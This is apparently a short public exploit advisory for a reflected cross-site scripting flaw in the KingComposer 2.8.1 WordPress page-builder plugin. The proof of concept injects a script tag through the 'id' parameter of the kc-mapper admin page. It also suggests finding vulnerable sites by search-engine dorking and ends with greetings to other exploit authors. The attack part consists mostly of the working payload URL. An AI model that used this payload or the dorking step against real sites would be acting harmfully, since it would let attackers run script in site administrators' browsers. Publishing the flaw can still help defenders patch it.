Headline
WordPress Page Builder KingComposer 2.8.1 Cross Site Scripting
WordPress Page Builder KingComposer plugin version 2.8.1 suffers from a cross site scripting vulnerability.
====================================================================================================================================| # Title : WordPress Page Builder KingComposer 2.8.1 XSS Vulnerability || # Author : indoushka || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | | # Vendor : https://kingcomposer.com/ | ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /wp-admin/admin.php?page=kc-mapper&id=<%2Fscript><script>alert(1)<%2Fscript>[+] http://192.168.0.103/wordpress/wp-admin/admin.php?page=kc-mapper&id=<%2Fscript><script>alert(1)<%2Fscript>Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================